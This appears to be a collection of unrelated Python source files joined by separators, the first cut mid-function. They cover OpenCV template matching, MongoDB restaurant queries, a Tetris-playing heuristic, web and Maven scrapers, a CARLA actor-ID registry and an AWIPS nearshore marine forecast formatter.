break
if img_type == "edged":
img_edged = cv2.Canny(resized, 50, 200)
resized = img_edged
result = cv2.matchTemplate(resized, selected_temp_img, cv2.TM_CCOEFF_NORMED)
(_, maxVal, _, maxLoc) = cv2.minMaxLoc(result)
if found is None or maxVal > found[0]:
# print(maxVal,maxLoc,r)
if maxVal > threshold:
found = (maxVal, maxLoc, r)
# unpack the found varaible and compute the (x, y) coordinates
# of the bounding box based on the resized ratio
if not(type(found) == type(None)):
(_, maxLoc, r) = found
# print("final :",found)
(startX, startY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))
(endX, endY) = (int((maxLoc[0] + w) * r), int((maxLoc[1] + h) * r))
x = (startX + endX)/2
y = (startY + endY)/2
return x,y
else:
return None
|
python
|
"""
Finds the dictionary for the measurement specification based on the name of the measurement.
"""
def find_measurement_spec(monitoring_system_specs, measurement_type):
"""
Scans the list of specs and returns dictionary of specifications for the named measurement type
Parameters
----------
monitoring_system_specs: list
The list of all measurement specs for a monitoring system
measurement_type: str
The name of the measurement type to be located
Returns
-------
dict
measurement specifications
"""
for specs in monitoring_system_specs:
for measurement in specs.items():
if measurement[1]['type']['name'] == measurement_type:
return measurement[1]
if __name__ == '__main__':
name = 'auxiliary_power'
monitoring_system_specs=[{'measurement_spec': {'name': 'HPP VA W 8% EP',
'description': 'Heat pump power, volt-amps, electrical panel',
'type': {'name': 'heatpump_power',
'msp_columns': None,
'description': ''},
'accuracy': '8.00000',
'accuracy_pct': True,
'meas_bias_abs': 0.0,
'meas_bias_pct': 0.0,
'location': {'name': 'Electrical Panel',
'description': ''},
'unit': {'name': 'W',
'description': 'watts'}}},
{'measurement_spec': {'name': 'HPP VA W 8% EP',
'description': 'Heat pump power, volt-amps, electrical panel',
'type': {'name': 'auxiliary_power',
'msp_columns': None,
'description': ''},
'accuracy': '8.00000',
'accuracy_pct': True,
'meas_bias_abs': 0.0,
'meas_bias_pct': 0.0,
'location': {'name': 'Electrical Panel',
'description': ''},
'unit': {'name': 'W',
'description': 'watts'}}}]
measurement_spec = find_measurement_spec(monitoring_system_specs, name)
|
python
|
# HeadPhoneJacks Cause Vaccines
# Softdev2 pd8
# K#06: Yummy Mango Py
#2019-02-28
import pymongo
SERVER_ADDR=""
connection =pymongo.MongoClient(SERVER_ADDR)
db = connection.test
collection = db.restaurants
def boro_find(borough):
'''
finds restaurants by borough and returns them in a list.
'''
restuarants = collection.find({'borough':borough})
return [restuarant for restuarant in restuarants]
def zip_find(zip):
'''
finds restaurants by zip and returns them in a list.
'''
zip = str(zip)
restuarants = collection.find({'address.zipcode':zip})
return [restuarant for restuarant in restuarants]
def zip_grade_find(zip, grade):
'''
finds restaurants by zip and grade and returns them in a list.
'''
zip = str(zip)
restuarants = collection.find(
{'$and':[
{'address.zipcode':zip},
{'grades.0.grade':grade},
]
}
)
return [restuarant for restuarant in restuarants]
def zip_score_find(zip, score):
'''
finds restaurants by zip and less than the given score and returns them in a list.
'''
zip = str(zip)
restuarants = collection.find(
{'$and':[
{'address.zipcode':zip},
{'grades.0.score':{'$lt':score}}, #nums are scores
]
}
)
return [restuarant for restuarant in restuarants]
def cuisine_score_boro_find(cuisine, score, borough):
'''
finds restaurants by cuisine, and greater than the given score, and borough and returns them in a list.
'''
restuarants = collection.find(
{'$and':[
{'cuisine':cuisine},
{'grades.0.score':{'$gt':score}}, #nums are scores
{'borough': borough},
]
}
)
return [restuarant for restuarant in restuarants]
if __name__ == '__main__':
print('Printing borough...')
print(boro_find('Bronx'))
print('Printing zip....')
print(zip_find(11104))
print('Printing borough and zip...')
print(zip_grade_find(11104, 'A'))
print('Printing zip and score...')
print(zip_score_find(11104, 200))
print('Printing cuisine, score, and borough...')
print(cuisine_score_boro_find('Chinese', 40, 'Manhattan'))
|
python
|
'''
Function:
AI玩俄罗斯方块
Author:
Charles
公众号:
Charles的皮卡丘
'''
import copy
import math
from modules.utils import *
'''AI玩俄罗斯方块'''
class TetrisAI():
def __init__(self, inner_board):
self.inner_board = inner_board
'''获得下一步的行动'''
def getNextAction(self):
if self.inner_board.current_tetris == tetrisShape().shape_empty:
return None
action = None
# 当前可操作的俄罗斯方块的direction范围
if self.inner_board.current_tetris.shape in [tetrisShape().shape_O]:
current_direction_range = [0]
elif self.inner_board.current_tetris.shape in [tetrisShape().shape_I, tetrisShape().shape_Z, tetrisShape().shape_S]:
current_direction_range = [0, 1]
else:
current_direction_range = [0, 1, 2, 3]
# 下一个可操作的俄罗斯方块的direction范围
if self.inner_board.next_tetris.shape in [tetrisShape().shape_O]:
next_direction_range = [0]
elif self.inner_board.next_tetris.shape in [tetrisShape().shape_I, tetrisShape().shape_Z, tetrisShape().shape_S]:
next_direction_range = [0, 1]
else:
next_direction_range = [0, 1, 2, 3]
# 简单的AI算法
for d_now in current_direction_range:
x_now_min, x_now_max, y_now_min, y_now_max = self.inner_board.current_tetris.getRelativeBoundary(d_now)
for x_now in range(-x_now_min, self.inner_board.width - x_now_max):
board = self.getFinalBoardData(d_now, x_now)
for d_next in next_direction_range:
x_next_min, x_next_max, y_next_min, y_next_max = self.inner_board.next_tetris.getRelativeBoundary(d_next)
distances = self.getDropDistances(board, d_next, range(-x_next_min, self.inner_board.width-x_next_max))
for x_next in range(-x_next_min, self.inner_board.width-x_next_max):
score = self.calcScore(copy.deepcopy(board), d_next, x_next, distances)
if not action or action[2] < score:
action = [d_now, x_now, score]
return action
'''获取当前俄罗斯方块在某位置以某方向下落到最低点时的板块数据'''
def getFinalBoardData(self, d_now, x_now):
board = copy.deepcopy(self.inner_board.getBoardData())
dy = self.inner_board.height - 1
for x, y in self.inner_board.current_tetris.getAbsoluteCoords(d_now, x_now, 0):
count = 0
while (count + y < self.inner_board.height) and (count + y < 0 or board[x + (count + y) * self.inner_board.width] == tetrisShape().shape_empty):
count += 1
count -= 1
if dy > count:
dy = count
return self.imitateDropDown(board, self.inner_board.current_tetris, d_now, x_now, dy)
'''模拟下落到最低点获得板块数据'''
def imitateDropDown(self, board, tetris, direction, x_imitate, dy):
for x, y in tetris.getAbsoluteCoords(direction, x_imitate, 0):
board[x + (y + dy) * self.inner_board.width] = tetris.shape
return board
'''获取下一个俄罗斯方块x_range范围内某状态俄罗斯方块到最低点的距离'''
def getDropDistances(self, board, direction, x_range):
dists = {}
for x_next in x_range:
if x_next not in dists:
dists[x_next] = self.inner_board.height - 1
for x, y in self.inner_board.next_tetris.getAbsoluteCoords(direction, x_next, 0):
count = 0
while (count + y < self.inner_board.height) and (count + y < 0 or board[x + (count + y) * self.inner_board.width] == tetrisShape().shape_empty):
count += 1
count -= 1
if dists[x_next] > count:
dists[x_next] = count
return dists
'''计算某方案的得分'''
def calcScore(self, board, d_next, x_next, distances):
# 下个俄罗斯方块以某种方式模拟到达底部
board = self.imitateDropDown(board, self.inner_board.next_tetris, d_next, x_next, distances[x_next])
width, height = self.inner_board.width, self.inner_board.height
# 下一个俄罗斯方块以某方案行动到达底部后的得分(可消除的行数)
removed_lines = 0
# 空位统计
hole_statistic_0 = [0] * width
hole_statistic_1 = [0] * width
# 方块数量
num_blocks = 0
# 空位数量
num_holes = 0
# 每个x位置堆积俄罗斯方块的最高点
roof_y = [0] * width
for y in range(height-1, -1, -1):
# 是否有空位
has_hole = False
# 是否有方块
has_block = False
for x in range(width):
if board[x + y * width] == tetrisShape().shape_empty:
has_hole = True
hole_statistic_0[x] += 1
else:
has_block = True
roof_y[x] = height - y
if hole_statistic_0[x] > 0:
hole_statistic_1[x] += hole_statistic_0[x]
hole_statistic_0[x] = 0
if hole_statistic_1[x] > 0:
num_blocks += 1
if not has_block:
break
if not has_hole and has_block:
removed_lines += 1
# 数据^0.7之和
num_holes = sum([i ** .7 for i in hole_statistic_1])
# 最高点
max_height = max(roof_y) - removed_lines
# roof_y做差分运算
roof_dy = [roof_y[i]-roof_y[i+1] for i in range(len(roof_y)-1)]
# 计算标准差E(x^2) - E(x)^2
if len(roof_y) <= 0:
roof_y_std = 0
else:
roof_y_std = math.sqrt(sum([y**2 for y in roof_y]) / len(roof_y) - (sum(roof_y) / len(roof_y)) ** 2)
if len(roof_dy) <= 0:
roof_dy_std = 0
else:
roof_dy_std = math.sqrt(sum([dy**2 for dy in roof_dy]) / len(roof_dy) - (sum(roof_dy) / len(roof_dy)) ** 2)
# roof_dy绝对值之和
abs_dy = sum([abs(dy) for dy in roof_dy])
# 最大值与最小值之差
max_dy = max(roof_y) - min(roof_y)
# 计算得分
score = removed_lines * 1.8 - num_holes * 1.0 - num_blocks * 0.5 - max_height ** 1.5 * 0.02 - roof_y_std * 1e-5 - roof_dy_std * 0.01 - abs_dy * 0.2 - max_dy * 0.3
return score
|
python
|
import requests
import urllib.request
import time
from bs4 import BeautifulSoup
import json
import csv
filecsv = open('SouqDataapple.csv', 'w',encoding='utf8')
# Set the URL you want to webscrape from
url = 'https://saudi.souq.com/sa-ar/apple/new/a-c/s/?section=2&page='
file = open('SouqDataapple.json','w',encoding='utf8')
file.write('[\n')
data = {}
csv_columns = ['name','price','img']
for page in range(1000):
print('---', page, '---')
r = requests.get(url + str(page))
print(url + str(page))
soup = BeautifulSoup(r.content, "html.parser")
ancher=soup.find_all('div',{'class' : 'column column-block block-grid-large single-item'})
writer = csv.DictWriter(filecsv, fieldnames=csv_columns)
i=0
writer.writeheader()
for pt in ancher:
name=pt.find('h6', {'class' : 'title itemTitle'})
itemPrice=pt.find('span', {'class' : 'itemPrice'})
img=pt.find('img', {'class' : 'img-size-medium'})
if img:
writer.writerow({'name': name.text.replace(' ', '').strip('\r\n'), 'price': itemPrice.text, 'img': img.get('src')})
data['name'] =name.text.replace(' ', '').strip('\r\n')
data['price'] =itemPrice.text
data['img'] =img.get('src')
json_data = json.dumps(data,ensure_ascii=False)
file.write(json_data)
file.write(",\n")
file.write("\n]")
filecsv.close()
file.close()
|
python
|
#!/usr/bin/python
#
# Scraper for libraries hosted at jcenter and custom maven repos
# Retrieves jar|aar files along with some meta data
# @author erik derr [[email protected]]
#
import sys
import json
import urllib2
import datetime
import os
import errno
import zipfile
import traceback
import xml.etree.ElementTree as ElementTree
from retrying import retry # may require "pip install retrying"
## functions ##
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def write_library_description(fileName, libName, category, version, date, comment):
make_sure_path_exists(os.path.dirname(fileName))
# write lib description in xml format
with open(fileName, "w") as desc:
desc.write("<?xml version=\"1.0\"?>\n")
desc.write("<library>\n")
desc.write(" <!-- library name -->\n")
desc.write(" <name>{}</name>\n".format(libName))
desc.write("\n")
desc.write(" <!-- Advertising, Analytics, Android, SocialMedia, Cloud, Utilities -->\n")
desc.write(" <category>{}</category>\n".format(category))
desc.write("\n")
desc.write(" <!-- optional: version string -->\n")
desc.write(" <version>{}</version>\n".format(version))
desc.write("\n")
desc.write(" <!-- optional: date (format: DD/MM/YYYY) -->\n")
desc.write(" <releasedate>{}</releasedate>\n".format(date))
desc.write("\n")
desc.write(" <!-- optional: comment -->\n")
desc.write(" <comment>{}</comment>\n".format(comment))
desc.write("</library>\n")
@retry(urllib2.URLError, tries=3, delay=3, backoff=1)
def urlopen_with_retry(URL):
return urllib2.urlopen(URL)
def downloadFile(targetDir, repoURL, groupid, artefactid, version, filetype):
make_sure_path_exists(os.path.dirname(targetDir + "/"))
# assemble download URL
fileName = artefactid + "-" + version + "." + filetype
URL = repoURL + "/" + groupid.replace(".","/") + "/" + artefactid.replace(".","/") + "/" + version + "/" + fileName
# retrieve and save file
targetFile = targetDir + "/" + fileName
try:
libFile = urllib2.urlopen(URL)
with open(targetFile,'wb') as output:
output.write(libFile.read())
return 0
except urllib2.HTTPError, e:
if filetype != 'aar':
print ' !! HTTP Error while retrieving ' + filetype + ' file: ' + str(e.code)
return 1
except urllib2.URLError, e:
print ' !! URL Error while retrieving ' + filetype + ' file: ' + str(e.reason)
return 1
except Exception, excp:
print ' !! Download failed: ' + str(excp)
return 1
def updateLibrary(libName, category, comment, repoURL, groupId, artefactId):
# replace all blanks with dash
libName = libName.replace(" ", "-")
print " # check library " + libName + " [" + category + "] (g:\"" + groupId + "\" AND a:\"" + artefactId + "\")"
baseDirName = rootDir + category + "/" + libName + "/"
dir = os.path.dirname(baseDirName)
make_sure_path_exists(dir);
# Assemble base URL and retrieve meta data
try:
mvnURL = repoURL + "/" + groupId.replace(".","/") + "/" + artefactId.replace(".","/")
metaURL = mvnURL + "/maven-metadata.xml"
response = urllib2.urlopen(metaURL)
data = response.read()
response.close()
except urllib2.URLError, e:
print 'URLError = ' + str(e.reason)
return
except Exception, excp:
print 'Could not retrieve meta data for ' + libName + ' [SKIP] (' + str(excp) + ')'
return
# retrieve available versions
versions = []
root = ElementTree.fromstring(data)
for vg in root.find('versioning'):
for v in vg.iter('version'):
if not skipAlphaBeta or (skipAlphaBeta and not '-alpha' in v.text and not '-beta' in v.text and not '-rc' in v.text and not '-dev' in v.text):
versions.append(v.text)
numberOfVersions = len(versions)
print " - retrieved meta data for " + str(numberOfVersions) + " versions:"
numberOfUpdates = 0
if numberOfVersions > 0:
for version in versions:
# skip lib version if already existing
if not os.path.isfile(baseDirName + "/" + version + "/" + libDescriptorFileName):
numberOfUpdates += 1
targetDir = baseDirName + version
print " - update version: {} type: {} date: {} target-dir: {}".format(version, "aar/jar", "n/a", targetDir)
result = downloadFile(targetDir, repoURL, groupId, artefactId, version, "aar")
if result == 1:
result = downloadFile(targetDir, repoURL, groupId, artefactId, version, "jar")
if result == 0:
# write lib description
fileName = targetDir + "/" + "library.xml"
write_library_description(fileName, libName, category, version, "", comment)
if numberOfUpdates == 0:
print " -> all versions up-to-date"
## Main functionality ##
inputFile = "glibs.json"
libDescriptorFileName = "library.xml"
rootDir = "my-mvn-repo/"
skipAlphaBeta = True # skip alpha and beta versions
print "== maven/jcenter scraper =="
# Requires one argument (path to json file with library descriptions)
args = len(sys.argv)
if args != 2:
print "Usage: " + sys.argv[0] + " <libraries.json>"
sys.exit(1)
else:
inputFile = sys.argv[1]
print "Load libraries from " + sys.argv[1]
# load iterate over lib json
with open(inputFile) as ifile:
data = json.load(ifile)
# update each lib
for lib in data["libraries"]:
if 'repo' not in lib:
repoURL = "http://jcenter.bintray.com"
else:
repoURL = lib['repo'] # custom maven
updateLibrary(lib["name"], lib["category"], lib["comment"], repoURL, lib["groupid"], lib["artefactid"])
|
python
|
#!/usr/bin/env python
#
# Copyright (c) 2018 Intel Labs.
#
# authors: Bernd Gassmann ([email protected])
#
"""
Actor registry class for carla-id mapping
"""
class ActorIdRegistry(object):
"""
Registry class to map carla-ids (potentially 64 bit)
to increasing numbers (usually not exceeding 32 bit)
"""
def __init__(self):
"""
Constructor
"""
self.id_lookup_table = {}
def get_id(self, actor_id):
"""
Return a unique counting id for the given actor_id
:param actor_id: the id of a carla.Actor object
:type actor_id: int64
:return: mapped id of the actor (unique increasing counter value)
:rtype: uint32
"""
if actor_id not in self.id_lookup_table:
self.id_lookup_table[actor_id] = len(self.id_lookup_table) + 1
return self.id_lookup_table[actor_id]
def get_id_string(self, actor_id):
"""
Return a string of a unique counting id for the given actor_id
:param actor_id: the id of a carla.Actor object
:type actor_id: int64
:return: string with leading zeros of mapped id of the actor
(unique increasing counter value)
:rtype: string
"""
mapped_id = self.get_id(actor_id)
return "{:03d}".format(mapped_id)
|
python
|
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
#-------------------------------------------------------------------------
# Description: This product creates a Near Shore Marine product.
#-------------------------------------------------------------------------
# Copying:
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#-------------------------------------------------------------------------
# Standard and Local file names and Locations:
# NSH, NSH_<site>_<MultiPil>_Definition, NSH_<site>_Overrides
#-------------------------------------------------------------------------
# Customization Points:
#
# REQUIRED OVERRIDE:
# _lakeStmt -- override with correct lake name(s) for your site
#
# DEFINITION SECTION
#
# Required Configuration Items:
#
# displayName If not None, defines how product appears in GFE GUI
# defaultEditAreas defines edit areas, default is Combinations
#
# productName defines name of product e.g. "Zone Forecast Product"
# fullStationID Full station identifier, 4 letter, such as "KSLC".
# wmoID WMO ID code for product header, such as "FOUS45"
# pil Product pil, such as "SFTBOS"
# areaName (opt.) Area name for product header, such as "Western New York"
# wfoCityState WFO location, such as "Buffalo NY"
#
# Optional Configuration Items
# editAreaSuffix default None. Allows for generating the body of the product for
# an edit area that is a subset (e.g. population areas) of the
# edit areas specified in the defaultEditAreas. So given the edit area,
# "COZ035" and the editAreaSuffix is "_pt", then the edit area that
# will be sampled and reported for the body of the product will be
# "COZ035_pt". If no such edit area exists, the system will simply
# use the original edit area.
# Note that Hazards will always be generated for the entire edit area.
# mapNameForCombinations Name of the map background that is used for
# creating/editing the combinations file. This must
# be defined or the GFE zone combiner
# database Source database for product. Can be "Official",
# "Fcst" or "ISC"
# outputFile Defines the output location of the finished product
# when saved from the Formatter Launcher.
# debug If on, debug_print statements will appear.
# textdbPil Defines the awips product identifier
# (e.g., DENCCFDEN) that is used to store the product
# in the AWIPS text database.
# This value is also used for the default GUI entry for
# storage.
# awipsWANPil Defines the AWIPS product identifier
# (e.g., KBOUCCFDEN) that is used to transmit the
# product to the AWIPS WAN.
# This value is also used for the default GUI
# entry for storage.
# hazardSamplingThreshold Defines the percentage coverage or number of
# grid points in a zone that must contain the hazard
# in order for it to be considered. Tuple (percent, points)
#
# periodCombining If 1, components an attempt will be made to combine components
# or time periods into one. Otherwise no period combining will
# will be done.
# useAbbreviations
# If 1, use marine abbreviations e.g. TSTM instead of THUNDERSTORM, NW instead of NORTHWEST
# (See marine_abbreviateText in the TextRules module)
# areaDictionary Modify the AreaDictionary utility with UGC information about zones
# useHolidays Set to 1 to use holidays in the time period labels
#
# Weather-related flags
# hoursSChcEnds - specifies hours past the beginning of the first
# first period of the product to stop including 'Slight
# Chance' or 'Isolated' weather types (ERH policy
# allows values of 1-5 * 12 hour periods)
#
# Trouble-shooting items
# passLimit -- Limit on passes allowed through Narrative Tree
# trace -- Set to 1 to turn on trace through Narrative Tree
#
# NARRATIVE CUSTOMIZATION POINTS
# The phrases in this product can be customized in many ways by overriding
# infrastructure methods in the Local file.
# You will see common overrides in the Local file and you may change them
# in that there.
# For further customization, you can determine which phrases your product is
# using by examining the Component Product Definitions below.
# Then, you can look up the phrase in the Text Product User Guide which will
# describe the all the relevant override methods associated with the phrase.
# Refer to the Customization section of the Text Product User Guide
# for step-by-step information.
#-------------------------------------------------------------------------
# Weather Elements Needed:
# To 2 days:
# Wind (every 3 hours)
# WaveHeight and/or WindWaveHgt (every 6 hours)
# Wx (every 6 hours)
# Sky (every 6 hours)
# Optional:
# WindGust (every 3 hours)
#-------------------------------------------------------------------------
# Edit Areas Needed:
#-------------------------------------------------------------------------
# Associated Utilities Files e.g. Combinations file:
# Combinations
#-------------------------------------------------------------------------
# Component Products:
# Hazards (optional): If Discrete grid provided, headlines will be generated.
# NSHPeriod
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
# Development tasks that are identified and in progress:
#
# To look up tasks and their status, see the Text Product User Guide
# Section on "Tkgnats: Task Reporting System".
#-------------------------------------------------------------------------
# Additional Information:
#
# COMMON OVERRIDES
# from CWF:
# _Text1
# _Text2
# _Text3
# _issuance_list
# from ConfigVariables:
# maximum_range_nlValue_dict
# minimum_range_nlValue_dict
# phrase_descriptor_dict
# scalar_difference_nlValue_dict
#
#-------------------------------------------------------------------------
# Example Output:
# Refer to the NWS Directives for Marine Services.
import TextRules
import SampleAnalysis
import ForecastNarrative
import time, string, re, types
### adding import of os for the MWW turnkey code at the end of the file
import os
class TextProduct(TextRules.TextRules, SampleAnalysis.SampleAnalysis):
VariableList = []
Definition = {
"type": "smart",
"displayName": "None",
"database": "Official",
# Defines output location of finished product.
"outputFile": "{prddir}/TEXT/NSH_<MultiPil>.txt",
"debug": 0,
# Name of map background for creating Combinations
"mapNameForCombinations": "Marine_Zones_<site>",
## Edit Areas: Create Combinations file with edit area combinations.
"showZoneCombiner" : 1, # 1 to cause zone combiner to display
"defaultEditAreas" : "Combinations_NSH_<site>_<MultiPil>",
"editAreaSuffix": None,
# product identifiers
"productName": "Nearshore Marine Forecast", # product name
"fullStationID": "<fullStationID>", # full station identifier (4letter)
"wmoID": "<wmoID>", # WMO ID
"pil": "<pil>", # Product pil
"areaName": "<state>", # Name of state, such as "Georgia"
"wfoCityState": "<wfoCityState>", # Location of WFO - city state
"textdbPil": "<textdbPil>", # Product ID for storing to AWIPS text database.
"awipsWANPil": "<awipsWANPil>", # Product ID for transmitting to AWIPS WAN.
"hazardSamplingThreshold": (10, None), #(%cov, #points)
"fixedExpire": 1, #ensure VTEC actions don't affect segment expiration time
"periodCombining" : 0, # If 1, combine periods, if possible
"lineLength": 66, # product line length
"useAbbreviations": 0, # Use marine abbreviations
# Area Dictionary -- Descriptive information about zones
"areaDictionary": "AreaDictionary",
"useHolidays": 0, # Set to 1 to use holidays in the time period labels
# Weather-related flags
"hoursSChcEnds": 24,
# Language
"language": "english",
# Trouble-shooting items
"passLimit": 20, # Limit on passes allowed through
# Narrative Tree
"trace": 0, # Set to 1 to turn on trace through
# Narrative Tree for trouble-shooting
}
def __init__(self):
TextRules.TextRules.__init__(self)
SampleAnalysis.SampleAnalysis.__init__(self)
self._outlookflag = 0
# TO BE OVERRIDDEN IN LOCAL FILE
def _Text1(self):
return ""
def _Text2(self):
return ""
def _Text3(self):
return ""
def _lakeStmt(self, argDict):
return "For waters within five nautical miles of shore on Lake (name)"
########################################################################
# OVERRIDING THRESHOLDS AND VARIABLES
########################################################################
### THRESHOLDS AND VARIABLES
### Analysis Class
### To override, override the associated method in your text product class.
def temporalCoverage_threshold(self, parmHisto, timeRange, componentName):
# Replaces IN_RANGE_THRESHOLD -- Note that this threshold is now used
# differently i.e. it is the percentage of the TIMERANGE covered by the
# grid in order to include it in the analysis
# Percentage of temporal coverage default value (if not found in temporalCoverage_dict)
# Used by temporalCoverage_flag
return 5.0
def temporalCoverage_dict(self, parmHisto, timeRange, componentName):
# Replaces IN_RANGE_DICT -- Note that this these thresholds are now used
return {
"LAL": 0,
"MinRH": 0,
"MaxRH": 0,
"MinT": 50,
"MaxT": 10,
"Haines": 0,
"Wx": 15,
"PoP" : 50,
}
# Uncomment any combinations you wish to collapse.
# For example, if the first entry is uncommented,
# the phrase: scattered rain showers and widespread rain
# will collapse to: scattered rain showers.
def wxCombinations(self):
return [
("RW", "R"),
("SW", "S"),
## ("T","RW"),
]
def vector_dir_difference_dict(self, tree, node):
# Direction difference. If the difference between directions
# for 2 sub-periods is greater than this value,
# the different directions will be noted in the phrase.
# Units are degrees
return {
"Wind": 40, # degrees
"TransWind": 60, # mph
"FreeWind": 60, # mph
"Swell":60, # degrees
"Swell2":60, # degrees
}
def phrase_descriptor_dict(self, tree, node):
dict = TextRules.TextRules.phrase_descriptor_dict(self, tree, node)
dict["Wind"] = "wind"
dict["around"] = ""
return dict
def null_nlValue_dict(self, tree, node):
# Threshold below which values are considered "null" and not reported.
# Units depend on the element and product
dict = TextRules.TextRules.null_nlValue_dict(self, tree, node)
dict["Wind"] = 5
return dict
def first_null_phrase_dict(self, tree, node):
# Phrase to use if values THROUGHOUT the period or
# in the first period are Null (i.e. below threshold OR NoWx)
# E.g. LIGHT WINDS. or LIGHT WINDS BECOMING N 5 MPH.
dict = TextRules.TextRules.first_null_phrase_dict(self, tree, node)
dict["Wind"] = "variable winds 10 knots or less"
return dict
def null_phrase_dict(self, tree, node):
# Phrase to use for null values in subPhrases other than the first
# Can be an empty string
# E.g. "NORTH 20 to 25 KNOTS BECOMING LIGHT"
dict = TextRules.TextRules.null_phrase_dict(self, tree, node)
dict["Wind"] = "variable 10 knots or less"
dict["Wx"] = ""
return dict
def marine_wind_flag(self, tree, node):
# If 1, Wind combining and wording will reflect the
# crossing of significant thresholds such as gales
return 1
def marine_wind_combining_flag(self, tree, node):
# If 1, Wind combining will reflect the
# crossing of significant thresholds such as gales.
# E.g. "Hurricane force winds to 100 knots." instead of
# "north hurricane force winds to 100 knots easing to
# hurricane force winds to 80 knots in the afternoon."
return 1
def postProcessPhrases(self, tree, node):
words = node.get("words")
if words is not None:
words = string.replace(words, "thunderstorms and rain showers",
"showers and thunderstorms")
words = string.replace(words, "snow showers and rain showers", "rain and snow showers")
words = string.replace(words, "rain showers and snow showers", "rain and snow showers")
#print "words = ", words
words = string.replace(words, "light rain showers", "rain showers")
words = string.replace(words, "rain showers", "showers")
#print "words 2= ", words
words = string.replace(words, "winds hurricane", "hurricane")
words = string.replace(words, "winds gales", "gales")
words = string.replace(words, "winds storm", "storm")
words = string.replace(words, "to to", "to")
words = string.replace(words, "winds 10 knots", "winds around 10 knots")
words = string.replace(words, "winds 5 knots", "winds around 5 knots")
words = string.replace(words, "and chance of", "and a chance of")
return self.setWords(node, words)
def rounding_method_dict(self, tree, node):
# Special rounding methods
#
return {
"Wind": self.marineRounding,
}
def scalar_difference_nlValue_dict(self, tree, node):
# Scalar difference. If the difference between scalar values
# for 2 sub-periods is greater than or equal to this value,
# the different values will be noted in the phrase.
dict = TextRules.TextRules.scalar_difference_nlValue_dict(self, tree, node)
dict["WaveHeight"] = {
(0, 6) : 1,
(6, 20) : 5,
'default': 10,
}
return dict
def minimum_range_nlValue_dict(self, tree, node):
# This threshold is the "smallest" min/max difference allowed between values reported.
# For example, if threshold is set to 5 for "MaxT", and the min value is 45
# and the max value is 46, the range will be adjusted to at least a 5 degree
# range e.g. 43-48. These are the values that are then submitted for phrasing
# such as:
# HIGHS IN THE MID 40S
dict = TextRules.TextRules.minimum_range_nlValue_dict(self, tree, node)
dict["Wind"] = {
(0,5) : 0, # will be reported as "null"
(5, 8) : 5,
"default" : 10,
}
return dict
########################################################################
# COMPONENT PRODUCT DEFINITIONS
########################################################################
def _PoP_analysisMethod(self, componentName):
# Alternative PoP analysis methods for consistency between PoP and Wx
return self.stdDevMaxAvg
#return self.maxMode
#return self.maximum
def NSHFirstPeriod(self):
return {
"type": "phrase",
"methodList": [
self.consolidateSubPhrases,
self.assemblePhrases,
self.postProcessPhrases,
self.wordWrap,
],
"analysisList": [
#("Wind", self.vectorMinMax, [3]),
("Wind", self.vectorMinMax, [4]),
#("WindGust", self.maximum, [3]),
("WindGust", self.maximum, [6]),
("WaveHeight", self.minMax, [3]),
("Wx", self.rankedWx, [6]),
("T", self.minMax),
("Sky", self.avg, [6]),
("PoP", self._PoP_analysisMethod("NSHFirstPeriod"), [6]),
("PoP", self.binnedPercent, [6]),
],
"phraseList":[
# WINDS
self.marine_wind_withGusts_phrase,
# Alternative:
#self.marine_wind_phrase,
#self.gust_phrase,
# WEATHER
self.weather_orSky_phrase,
self.visibility_phrase,
# WAVES
self.waveHeight_phrase,
# Optional:
#self.chop_phrase,
],
"lineLength": 66,
"runTimeEditArea": "yes",
}
def NSHPeriod(self):
return {
"type": "phrase",
"methodList": [
self.consolidateSubPhrases,
self.assemblePhrases,
self.postProcessPhrases,
self.wordWrap,
],
"analysisList": [
#("Wind", self.vectorMinMax, [3]),
("Wind", self.vectorMinMax, [4]),
#("WindGust", self.maximum, [3]),
("WindGust", self.maximum, [6]),
("WaveHeight", self.minMax, [3]),
("Wx", self.rankedWx, [6]),
("T", self.minMax),
("Sky", self.avg, [6]),
("PoP", self._PoP_analysisMethod("NSHPeriod"), [6]),
("PoP", self.binnedPercent, [6]),
],
"phraseList":[
# WINDS
self.marine_wind_withGusts_phrase,
# Alternative:
#self.marine_wind_phrase,
#self.gust_phrase,
# WEATHER
self.weather_orSky_phrase,
self.visibility_phrase,
# WAVES
self.waveHeight_phrase,
# Optional:
#self.chop_phrase,
#outlook phrase
self._warnOutlook_phrase,
],
"lineLength": 66,
"runTimeEditArea": "yes",
}
def generateForecast(self, argDict):
# Get variables
error = self._getVariables(argDict)
if error is not None:
return error
# Get the areaList -- derived from defaultEditAreas and
# may be solicited at run-time from user if desired
self._areaList = self.getAreaList(argDict)
if len(self._areaList) == 0:
return "WARNING -- No Edit Areas Specified to Generate Product."
# Determine time ranges
error = self._determineTimeRanges(argDict)
if error is not None:
return error
# Sample the data
error = self._sampleData(argDict)
if error is not None:
return error
# Initialize the output string
fcst = ""
fcst = self._preProcessProduct(fcst, argDict)
# Generate the product for each edit area in the list
fraction = 0
fractionOne = 1.0/float(len(self._areaList))
percent = 50.0
self.setProgressPercentage(percent)
for editArea, areaLabel in self._areaList:
self.progressMessage(fraction, percent, "Making Product for " + areaLabel)
fcst = self._preProcessArea(fcst, editArea, areaLabel, argDict)
fcst = self._makeProduct(fcst, editArea, areaLabel, argDict)
fcst = self._postProcessArea(fcst, editArea, areaLabel, argDict)
fraction = fractionOne
fcst = self._postProcessProduct(fcst, argDict)
return fcst
def _getVariables(self, argDict):
#part below is to eliminate time prompt added by Meade
# Get Definition variables
self._definition = argDict["forecastDef"]
for key in self._definition.keys():
exec "self._" + key + "= self._definition[key]"
localtime = time.localtime(argDict['creationTime'])
localHour = localtime[3]
self._setProductIssuance(localHour)
# Get VariableList and _issuance_list variables
varDict = argDict["varDict"]
for key in varDict.keys():
if type(key) is types.TupleType:
label, variable = key
exec "self._" + variable + "= varDict[key]"
self._format = "Standard"
